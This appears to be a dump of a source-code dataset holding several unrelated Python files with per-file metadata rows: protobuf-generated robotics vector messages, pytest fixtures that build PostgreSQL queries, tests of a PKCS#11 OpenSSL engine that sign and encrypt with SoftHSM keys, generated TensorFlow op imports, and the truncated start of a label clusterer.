],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=406,
serialized_end=438,
)
_VECTORD = _descriptor.Descriptor(
name='Vectord',
full_name='robotics.messages.Vectord',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectord.data', index=0,
number=1, type=1, cpp_type=5, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=440,
serialized_end=467,
)
_VECTORF = _descriptor.Descriptor(
name='Vectorf',
full_name='robotics.messages.Vectorf',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectorf.data', index=0,
number=1, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=469,
serialized_end=496,
)
_VECTORI = _descriptor.Descriptor(
name='Vectori',
full_name='robotics.messages.Vectori',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='robotics.messages.Vectori.data', index=0,
number=1, type=3, cpp_type=2, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\020\001', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=498,
serialized_end=525,
)
DESCRIPTOR.message_types_by_name['Vector4d'] = _VECTOR4D
DESCRIPTOR.message_types_by_name['Vector4f'] = _VECTOR4F
DESCRIPTOR.message_types_by_name['Vector4i'] = _VECTOR4I
DESCRIPTOR.message_types_by_name['Vector3d'] = _VECTOR3D
DESCRIPTOR.message_types_by_name['Vector3f'] = _VECTOR3F
DESCRIPTOR.message_types_by_name['Vector3i'] = _VECTOR3I
DESCRIPTOR.message_types_by_name['Vector2d'] = _VECTOR2D
DESCRIPTOR.message_types_by_name['Vector2f'] = _VECTOR2F
DESCRIPTOR.message_types_by_name['Vector2i'] = _VECTOR2I
DESCRIPTOR.message_types_by_name['Vectord'] = _VECTORD
DESCRIPTOR.message_types_by_name['Vectorf'] = _VECTORF
DESCRIPTOR.message_types_by_name['Vectori'] = _VECTORI
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Vector4d = _reflection.GeneratedProtocolMessageType('Vector4d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4d)
})
_sym_db.RegisterMessage(Vector4d)
Vector4f = _reflection.GeneratedProtocolMessageType('Vector4f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4f)
})
_sym_db.RegisterMessage(Vector4f)
Vector4i = _reflection.GeneratedProtocolMessageType('Vector4i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR4I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector4i)
})
_sym_db.RegisterMessage(Vector4i)
Vector3d = _reflection.GeneratedProtocolMessageType('Vector3d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3d)
})
_sym_db.RegisterMessage(Vector3d)
Vector3f = _reflection.GeneratedProtocolMessageType('Vector3f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3f)
})
_sym_db.RegisterMessage(Vector3f)
Vector3i = _reflection.GeneratedProtocolMessageType('Vector3i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR3I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector3i)
})
_sym_db.RegisterMessage(Vector3i)
Vector2d = _reflection.GeneratedProtocolMessageType('Vector2d', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2D,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2d)
})
_sym_db.RegisterMessage(Vector2d)
Vector2f = _reflection.GeneratedProtocolMessageType('Vector2f', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2F,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2f)
})
_sym_db.RegisterMessage(Vector2f)
Vector2i = _reflection.GeneratedProtocolMessageType('Vector2i', (_message.Message,), {
'DESCRIPTOR' : _VECTOR2I,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vector2i)
})
_sym_db.RegisterMessage(Vector2i)
Vectord = _reflection.GeneratedProtocolMessageType('Vectord', (_message.Message,), {
'DESCRIPTOR' : _VECTORD,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectord)
})
_sym_db.RegisterMessage(Vectord)
Vectorf = _reflection.GeneratedProtocolMessageType('Vectorf', (_message.Message,), {
'DESCRIPTOR' : _VECTORF,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectorf)
})
_sym_db.RegisterMessage(Vectorf)
Vectori = _reflection.GeneratedProtocolMessageType('Vectori', (_message.Message,), {
'DESCRIPTOR' : _VECTORI,
'__module__' : 'vector_pb2'
# @@protoc_insertion_point(class_scope:robotics.messages.Vectori)
})
_sym_db.RegisterMessage(Vectori)
DESCRIPTOR._options = None
_VECTORD.fields_by_name['data']._options = None
_VECTORF.fields_by_name['data']._options = None
_VECTORI.fields_by_name['data']._options = None
# @@protoc_insertion_point(module_scope)
| 36.347894 | 1,317 | 0.738272 | 2,971 | 23,299 | 5.471895 | 0.055537 | 0.050194 | 0.071292 | 0.071415 | 0.806545 | 0.747862 | 0.735376 | 0.732054 | 0.732054 | 0.727071 | 0 | 0.04327 | 0.131079 | 23,299 | 640 | 1,318 | 36.404688 | 0.759743 | 0.042148 | 0 | 0.701389 | 1 | 0.001736 | 0.147387 | 0.107064 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006944 | 0 | 0.006944 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ccc448681d0f64c8416d4f76b6aea20b493a57ba | 6,473 | py | Python | winnum_sender_service/tests/conftest.py | OlegZhavoronkov/tnk_certification | 9ef3544f3fd27073b78e38bba26af76e79f55a78 | [
"Unlicense"
] | null | null | null | winnum_sender_service/tests/conftest.py | OlegZhavoronkov/tnk_certification | 9ef3544f3fd27073b78e38bba26af76e79f55a78 | [
"Unlicense"
] | null | null | null | winnum_sender_service/tests/conftest.py | OlegZhavoronkov/tnk_certification | 9ef3544f3fd27073b78e38bba26af76e79f55a78 | [
"Unlicense"
] | null | null | null | from datetime import datetime
import psycopg2
import pytest
from sent_to_winnum import WinnumLogger, Config
CFG_PATH = 'config/config.json'
@pytest.fixture(scope='session')
def pg_connect():
conn = None
try:
conn = psycopg2.connect(host=Config.postgresql_host, dbname=Config.dbname, user=Config.user,
password=Config.password)
with conn.cursor() as cursor:
yield cursor
cursor.close()
except psycopg2.DatabaseError as e:
print(e)
finally:
if conn is not None:
conn.close()
@pytest.fixture(scope='session', autouse=True)
def init():
WinnumLogger.init_logger()
WinnumLogger.get_logger()
Config.load(CFG_PATH)
@pytest.fixture
def build_bad_mandrel_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_bad_pipe_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_mandrel_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"INSERT INTO mandrels(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_pipe_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'pipe'), 13, '{obj_id}');\n"
f"INSERT INTO pipes(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_pipe_query_with_2_defects():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'pipe'), 13, '{obj_id}');\n"
f"INSERT INTO pipes(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, FALSE);\n"
f"INSERT INTO pipes_defects(id, pipe_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_mandrel_id FROM pipes m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"INSERT INTO pipes_defects(id, pipe_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_mandrel_id FROM pipes m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_mandrel_query_with_2_defects():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'mandrel'), 13, '{obj_id}');\n"
f"INSERT INTO mandrels(id, object_id, last_detection, diameter, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, FALSE);\n"
f"INSERT INTO mandrels_defects(id, detected_timestamp, mandrel_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, '2021-08-10 12:14:16.928', (SELECT max(id) AS max_mandrel_id FROM mandrels m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"INSERT INTO mandrels_defects(id, detected_timestamp, mandrel_id, defect_id, POSITION, SIZE, depth, PRECISION, image_url)\n"
f"VALUES (DEFAULT, '2021-08-10 12:14:16.928', (SELECT max(id) AS max_mandrel_id FROM mandrels m), 2, 6273.000000, 470, 7.000000, -1.000000, '/home/vault/picture_arc');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_valid_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"INSERT INTO billets(id, object_id, last_detection, diameter1, diameter2, diameter3, length, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, 556.000000, 556.000000, 4444234, TRUE);\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_bad_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"COMMIT;\n"
)
@pytest.fixture
def build_defect_billet_query():
obj_id = datetime.now().strftime("object_%Y_%m_%d_%H_%M_%S_%f")
return (
f"BEGIN TRANSACTION;\n"
f"INSERT INTO objects\n"
f"VALUES (DEFAULT, (SELECT object_types.id FROM object_types WHERE object_types.name = 'billet'), 13, '{obj_id}');\n"
f"INSERT INTO billets(id, object_id, last_detection, diameter1, diameter2, diameter3, length, CONDITION)\n"
f"VALUES (DEFAULT, (SELECT max(id) AS max_object_id FROM objects o), '2021-08-10 12:14:16.928', 556.000000, 556.000000, 556.000000, 4444234, FALSE);\n"
f"COMMIT;\n"
) | 36.365169 | 178 | 0.659509 | 984 | 6,473 | 4.132114 | 0.123984 | 0.023119 | 0.037383 | 0.056075 | 0.877275 | 0.871372 | 0.871372 | 0.871372 | 0.871372 | 0.853419 | 0 | 0.073312 | 0.197127 | 6,473 | 178 | 179 | 36.365169 | 0.709063 | 0 | 0 | 0.648 | 0 | 0.2 | 0.624961 | 0.055453 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088 | false | 0.008 | 0.032 | 0 | 0.192 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aeffa071d22cc3d8387e8b0d1cb6b5e15efed3e7 | 230 | py | Python | cmp_telegram_pusher/src/exceptions/bad_response_exception.py | andrii-z4i/xmind-telegram | 82e50ae0ada048b87a2c082bbdd4510e02cb3694 | [
"MIT"
] | null | null | null | cmp_telegram_pusher/src/exceptions/bad_response_exception.py | andrii-z4i/xmind-telegram | 82e50ae0ada048b87a2c082bbdd4510e02cb3694 | [
"MIT"
] | 16 | 2018-05-07T09:42:56.000Z | 2018-11-19T06:05:51.000Z | cmp_telegram_pusher/src/exceptions/bad_response_exception.py | andrii-z4i/xmind-telegram | 82e50ae0ada048b87a2c082bbdd4510e02cb3694 | [
"MIT"
] | null | null | null | class BadResponseException(Exception):
def __init__(self, reason: str) -> None:
super().__init__(reason, None)
self._reason: str = reason
@property
def reason(self) -> str:
return self._reason
| 25.555556 | 44 | 0.634783 | 25 | 230 | 5.44 | 0.48 | 0.220588 | 0.191176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252174 | 230 | 8 | 45 | 28.75 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.142857 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
3b000601767e437ddece29511d099a7454bc6189 | 12,371 | py | Python | tests/test_engine.py | space88man/cryptography_engine | 76723f66b1903b8c5035c997eb178138f86c627a | [
"MIT"
] | null | null | null | tests/test_engine.py | space88man/cryptography_engine | 76723f66b1903b8c5035c997eb178138f86c627a | [
"MIT"
] | null | null | null | tests/test_engine.py | space88man/cryptography_engine | 76723f66b1903b8c5035c997eb178138f86c627a | [
"MIT"
] | 1 | 2021-08-17T07:28:25.000Z | 2021-08-17T07:28:25.000Z | import os
from cryptography_engine import engine
import subprocess
os.environ["SOFTHSM2_CONF"] = "tests/softhsm2.conf"
os.environ["OPENSSL_CONF"] = "tests/fixtures/openssl.cnf"
PIN = "userpin"
TOKEN = "MyToken1"
RSA_ALIAS = "RSA-0001"
EC_ALIAS = "EC-0003"
test_data = os.environ.get("TEST_ENGINE_DATA", None)
if test_data:
TOKEN, PIN, RSA_ALIAS, EC_ALIAS = test_data.split()
RSA_PKCS11_URL = f"pkcs11:token={TOKEN};object={RSA_ALIAS}"
EC_PKCS11_URL = f"pkcs11:token={TOKEN};object={EC_ALIAS}"
class TestEngine:
def test_engine_load(self):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
engine.engine_finish(e)
def test_rsa_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_sign_data"
p.write_bytes(data)
for k in ("sha1", "sha256", "sha384", "sha512"):
sig = pkey.sign(
data, engine.engine_padding_pkcs1(), engine.engine_hashes(k)
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / "test_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(
sig, data, engine.engine_padding_pkcs1(), engine.engine_hashes(k)
)
engine.engine_finish(e)
def test_pss_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_pss_sign_data"
p.write_bytes(data)
for k in ("sha256:222", "sha256:96", "sha384:206", "sha512:64"):
k, saltlen = k.split(":")
padding = engine.engine_padding_pss(k, int(saltlen))
sig = pkey.sign(data, padding, engine.engine_hashes(k))
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / "test_pss_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-sigopt",
"rsa_padding_mode:pss",
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(sig, data, padding, engine.engine_hashes(k))
engine.engine_finish(e)
def test_ec_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = EC_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = b"\x00" * 8192
p = tmp_path / "test_ec_sign_data"
p.write_bytes(data)
for k in ("sha256", "sha384", "sha512"):
sig = pkey.sign(data, engine.ecdsa_with_hash(k))
p_sig = tmp_path / "test_ec_sign_sig"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
pubkey.verify(sig, data, engine.ecdsa_with_hash(k))
engine.engine_finish(e)
def test_rsa_encrypt(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(128)
p = tmp_path / "test_encrypt_data"
p.write_bytes(data)
padding = engine.engine_padding_pkcs1()
out = pubkey.encrypt(data, padding)
ciphered = tmp_path / "test_encrypt_ciphertext"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plaintext"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = pkey.decrypt(out, padding)
assert data == recover
padding = engine.engine_padding_oaep("sha256", "sha256")
out = pubkey.encrypt(data, padding)
ciphered = tmp_path / "test_encrypt_cipheroaep"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plainoaep"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-pkeyopt",
"rsa_padding_mode:oaep",
"-pkeyopt",
"rsa_mgf1_md:sha256",
"-pkeyopt",
"rsa_oaep_md:sha256",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = pkey.decrypt(out, padding)
assert data == recover
engine.engine_finish(e)
def test_engine_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(1048576)
p = tmp_path / "test_sign_data"
p.write_bytes(data)
for k in ("sha256", "sha384", "sha512"):
sig = engine.engine_sign(
pkey._evp_pkey,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PADDING,),
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / f"test_sign_sig-{k}"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-signature",
f"{p_sig}",
f"{p}",
]
)
assert proc.returncode == 0
engine.engine_verify(
pubkey._evp_pkey,
sig,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PADDING,),
)
engine.engine_finish(e)
def test_engine_pss_sign(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(1048576)
p = tmp_path / "test_pss_sign_data"
p.write_bytes(data)
for k in ("sha256:64", "sha384:-1", "sha512:-2"):
k, pss_saltlen = k.split(":")
pss_saltlen = int(pss_saltlen)
sig = engine.engine_sign(
pkey._evp_pkey,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PSS_PADDING, pss_saltlen),
)
assert len(sig) in (128, 256, 384, 512)
p_sig = tmp_path / f"test_pss_sign_sig-{k}"
p_sig.write_bytes(sig)
proc = subprocess.run(
[
"openssl",
"dgst",
f"-{k}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-verify",
alias,
"-sigopt",
"rsa_padding_mode:pss",
"-signature",
f"{p_sig}",
f"{p}"
]
)
assert proc.returncode == 0
engine.engine_verify(
pubkey._evp_pkey,
sig,
data,
algorithm=k,
padding=(engine.RSAPadding.RSA_PKCS1_PSS_PADDING, pss_saltlen),
)
engine.engine_finish(e)
def test_engine_encrypt(self, tmp_path):
e = engine.engine_init("pkcs11", [("PIN", PIN)])
alias = RSA_PKCS11_URL
pkey = engine.engine_load_private_key(e, alias)
pubkey = engine.engine_load_public_key(e, alias)
data = os.urandom(128)
p = tmp_path / "test_encrypt_data"
p.write_bytes(data)
out = engine.engine_encrypt(pubkey._evp_pkey, data, (1,))
ciphered = tmp_path / "test_encrypt_ciphertext"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plaintext"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = engine.engine_decrypt(
pkey._evp_pkey, out, (engine.RSAPadding.RSA_PKCS1_PADDING,)
)
assert data == recover
out = engine.engine_encrypt(
pubkey._evp_pkey,
data,
padding=(engine.RSAPadding.RSA_PKCS1_OAEP_PADDING, "sha256", "sha256"),
)
ciphered = tmp_path / "test_encrypt_cipheroaep"
ciphered.write_bytes(out)
plaintext = tmp_path / "test_encrypt_plainoaep"
proc = subprocess.run(
[
"openssl",
"pkeyutl",
"-decrypt",
"-in",
f"{ciphered}",
"-out",
f"{plaintext}",
"-engine",
"pkcs11",
"-keyform",
"engine",
"-pkeyopt",
"rsa_padding_mode:oaep",
"-pkeyopt",
"rsa_mgf1_md:sha256",
"-pkeyopt",
"rsa_oaep_md:sha256",
"-inkey",
RSA_PKCS11_URL,
]
)
assert proc.returncode == 0
recover = engine.engine_decrypt(
pkey._evp_pkey,
out,
(engine.RSAPadding.RSA_PKCS1_OAEP_PADDING, "sha256", "sha256"),
)
assert data == recover
engine.engine_finish(e)
| 27.862613 | 83 | 0.458168 | 1,187 | 12,371 | 4.515586 | 0.095198 | 0.109701 | 0.03694 | 0.033582 | 0.892724 | 0.887313 | 0.876493 | 0.828918 | 0.792537 | 0.781343 | 0 | 0.039349 | 0.428906 | 12,371 | 443 | 84 | 27.925508 | 0.719321 | 0 | 0 | 0.744318 | 0 | 0 | 0.138227 | 0.027969 | 0 | 0 | 0 | 0 | 0.048295 | 1 | 0.022727 | false | 0 | 0.008523 | 0 | 0.034091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d1a7067e877fda35749497665ab994aa65b19927 | 824 | py | Python | venv/lib/python3.6/site-packages/tensorflow_core/compiler/tf2tensorrt/ops/gen_trt_ops.py | databill86/HyperFoods | 9267937c8c70fd84017c0f153c241d2686a356dd | [
"MIT"
] | 2 | 2020-09-30T00:11:09.000Z | 2021-10-04T13:00:38.000Z | venv/lib/python3.6/site-packages/tensorflow_core/compiler/tf2tensorrt/ops/gen_trt_ops.py | databill86/HyperFoods | 9267937c8c70fd84017c0f153c241d2686a356dd | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/tensorflow_core/compiler/tf2tensorrt/ops/gen_trt_ops.py | databill86/HyperFoods | 9267937c8c70fd84017c0f153c241d2686a356dd | [
"MIT"
] | null | null | null | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: trt_ops.cc
"""
import collections
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
| 37.454545 | 75 | 0.849515 | 120 | 824 | 5.641667 | 0.333333 | 0.227474 | 0.324963 | 0.171344 | 0.358936 | 0.118168 | 0.118168 | 0 | 0 | 0 | 0 | 0 | 0.106796 | 824 | 21 | 76 | 39.238095 | 0.919837 | 0.146845 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d1dfb1be06864ae419dc461243451275816338e8 | 93,513 | py | Python | label_clusterer.py | kathrynchapman/LA_MC2C | 62c2477a77dc1e8c8ba435e8dd37c4e4a33bbc78 | [
"CC0-1.0"
] | null | null | null | label_clusterer.py | kathrynchapman/LA_MC2C | 62c2477a77dc1e8c8ba435e8dd37c4e4a33bbc78 | [
"CC0-1.0"
] | null | null | null | label_clusterer.py | kathrynchapman/LA_MC2C | 62c2477a77dc1e8c8ba435e8dd37c4e4a33bbc78 | [
"CC0-1.0"
] | 1 | 2021-09-03T10:11:35.000Z | 2021-09-03T10:11:35.000Z | import numpy as np
import pickle
from tqdm import tqdm, trange
import math
from collections import defaultdict, Counter, OrderedDict
import operator
import os
import sys
from distance_computer import *
def sort_by_values_len(dict):
dict_len = {key: len(value) for key, value in dict.items()}
